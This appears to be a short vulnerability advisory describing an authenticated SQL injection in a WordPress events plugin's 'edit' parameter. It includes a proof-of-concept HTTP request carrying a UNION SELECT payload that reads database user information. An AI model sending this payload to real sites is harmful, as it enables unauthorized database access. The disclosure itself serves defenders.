The plugin does not sanitise, validate or escape the edit GET parameter before using it in a SQL statement when editing events, leading to an authenticated SQL injection issue. Other SQL Injections are also present in the plugin
GET /wp-admin/admin.php?page=events&edit=-4292%20UNION%20ALL%20SELECT%20user(),user(),current_user()-- HTTP/1.1
Accept-Language: en-US,en;q=0.9
Cookie: [admin+]
Connection: close